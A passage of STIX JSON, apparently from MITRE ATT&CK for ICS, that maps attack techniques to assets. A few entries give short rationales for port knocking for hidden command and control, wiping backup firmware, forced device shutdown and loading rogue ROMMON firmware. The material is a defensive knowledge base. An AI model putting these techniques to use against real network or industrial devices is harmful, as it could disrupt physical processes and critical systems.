"target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--368558ce-e8a6-4375-b54f-47c2ab31e38d", "created": "2023-09-28T20:29:27.153Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:29:27.153Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--36a95914-56c4-4b3a-ac99-3bd9ff84cd7e", "created": "2024-05-22T17:09:34.797Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T01:13:19.432Z", "description": "Asset Mapping Rationale: Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. One means, originally implemented by Cd00r, is to use the libpcap libraries to sniff for the packets in question.", "relationship_type": "targets", "source_ref": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--37048032-b41d-47d8-9c73-7b706bef24d1", "created": "2023-09-28T20:27:58.625Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:27:58.625Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--372c2e72-d56a-4501-a3bc-31b6b0c8d0be", "created": "2023-09-28T21:13:36.185Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:13:36.185Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3731962f-64e7-4750-ac8b-40b97eef8725", "created": "2023-09-29T16:41:15.943Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:41:15.943Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--374837a0-6109-4c95-bee6-893b25ac71cf", "created": "2023-09-28T21:13:12.715Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:13:12.715Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--378b19ca-8f2f-4ede-a493-8daf14c16342", "created": "2020-03-11T14:11:16.807Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--29ba5a15-3b7b-4732-b817-65ea8f6468e6", "target_ref": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--37aeaf27-6bbe-4949-ba77-37649e38f8b2", "created": "2023-09-29T16:31:46.749Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:31:46.749Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3819b66b-51e4-440d-93cf-12e8b6892e3e", "created": "2020-03-02T19:15:44.284Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", "target_ref": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3843dcca-62a2-4224-9241-05f981fa880a", "created": "2023-09-28T19:46:23.921Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:46:23.921Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--386a591e-3e8e-4f23-8a5c-60abfa831d30", "created": "2020-02-21T16:22:09.780Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc", "target_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3871b3d6-9b62-4f20-af9f-8317b263b5a8", "created": "2020-02-12T18:55:55.461Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--9e09ddb2-1746-4448-9cad-7f8b41777d6d", "target_ref": "attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--38ae2a97-1756-4452-b542-33d00b891742", "created": "2024-01-02T13:43:37.736Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-01-02T13:43:37.736Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--ceaeb6d8-95ee-4da2-9d42-dc6aa6ca43ae", "target_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--38b33f88-bc7e-4376-891d-51e7a0404174", "created": "2020-03-19T15:09:22.409Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--46944654-fcc1-4f63-9dad-628102376586", "target_ref": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--38bda770-c470-4358-a9ad-a5b39bec026b", "created": "2023-09-29T16:28:28.550Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:28:28.550Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--38c7e0b8-3961-48ed-b5e6-c4763c212ecb", "created": "2020-03-15T00:30:25.597Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--f7c0689c-4dbd-489b-81be-7cb7c7079ade", "target_ref": "attack-pattern--ad255bfe-a9e6-4b52-a258-8d3462abe842", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--39084aef-6ba7-4370-832f-b10002b97804", "created": "2020-01-24T14:07:56.483Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58", "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--39221b72-9f98-4434-9de6-139c154b8705", "created": "2020-01-24T19:47:55.649Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--1f47e2fd-fa77-4f2f-88ee-e85df308f125", "target_ref": "attack-pattern--43881e51-ac74-445b-b4c6-f9f9e9bf23fe", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--39452123-574f-4f3a-95ec-a90170a3d7eb", "created": "2023-10-02T20:20:44.850Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-10-02T20:20:44.850Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--399126a9-815d-4c3b-9d5e-f57d698ac742", "created": "2023-09-28T19:40:36.023Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:40:36.023Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--39dc7fb7-0b62-466e-ac6c-27766bb92fbc", "created": "2024-05-23T04:19:41.699Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T01:17:47.359Z", "description": "Asset Mapping Rationale: Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery. On network devices, adversaries may leverage Disk Wipe to delete backup firmware images and reformat the file system, then System Shutdown/Reboot to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.", "relationship_type": "targets", "source_ref": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--39e5a489-f557-4130-a285-e0a82f40685c", "created": "2023-09-28T19:46:38.112Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:46:38.112Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--39f785a8-4175-4d3c-ba64-e20ad4bc2584", "created": "2023-09-28T19:40:21.763Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:40:21.763Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3a20ed21-5e69-4a16-a0e3-bace3eba9974", "created": "2023-09-29T18:56:47.109Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-05-28T01:24:28.585Z", "description": "Asset Mapping Rationale: Adversaries may forcibly restart or shutdown a device in an ICS environment to disrupt and potentially negatively impact physical processes. Methods of device restart and shutdown exist in some devices as built-in, standard functionalities. These functionalities can be executed using interactive device web interfaces, CLIs, and network protocol commands.", "relationship_type": "targets", "source_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3a53c211-191a-4953-8fab-159077bb89f8", "created": "2020-03-10T17:45:00.304Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd", "target_ref": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3a76a181-8706-4bc4-9c66-7e809fec44ca", "created": "2023-09-28T19:44:37.687Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:44:37.687Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3a837390-7974-44e0-9d60-4c9831b8e272", "created": "2020-02-19T18:52:25.318Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a", "target_ref": "attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3aa2691d-d88d-4467-ae3e-242b3bac22ea", "created": "2023-09-28T21:15:18.036Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:15:18.036Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3ad966be-8cb2-42e6-b696-ef9e3b512e35", "created": "2023-09-28T19:43:15.817Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:43:15.817Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3b7f39cb-0101-49b0-ab02-a5adb1672688", "created": "2023-09-28T19:53:33.603Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:53:33.603Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3b8633ab-4fa5-4310-bd0f-80964ecfae41", "created": "2020-02-20T21:08:52.969Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--41868330-6ee2-4d0f-b743-9f2294c3c9b6", "target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3bc61c8f-3d04-40bd-8239-a15913056bb2", "created": "2023-10-02T20:22:15.907Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-10-02T20:22:15.908Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3bdb0dad-0c0c-4ced-bac1-8a9c5c89bb09", "created": "2023-09-07T21:48:42.771Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-07T21:48:42.771Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--6a5d222a-a7e0-4656-b110-782c33098289", "target_ref": "attack-pattern--cca0ccb6-a068-4574-a722-b1556f86833a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3bdfb695-b617-47ba-bfad-30ccf7f0ee92", "created": "2021-03-17T20:33:20.224Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--31fe0ba2-62fd-4fd9-9293-4043d84f7fe9", "target_ref": "attack-pattern--84771bc3-f6a0-403e-b144-01af70e5fda0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3be9d897-5a20-4e2f-8b73-2a69256925b0", "created": "2020-10-02T16:50:12.902Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968", "target_ref": "attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3c839b0b-493c-4173-a820-5624a08538fd", "created": "2024-05-22T17:08:56.346Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T01:27:24.547Z", "description": "Asset Mapping Rationale: Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. Mitigation: Network intrusion detection and prevention systems that use network signatures to identify traffic for specific protocols, such as TFTP, can be used to mitigate activity at the network level.", "relationship_type": "targets", "source_ref": "attack-pattern--a6557c75-798f-42e4-be70-ab4502e0a3bc", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3d131e85-111d-4df2-ba93-274acba5146f", "created": "2020-02-05T14:18:21.951Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--6ff403bc-93e3-48be-8687-e102fdba8c88", "target_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3d16dbff-d1fc-42e0-b736-69ddee747ffe", "created": "2020-03-14T23:12:18.657Z", 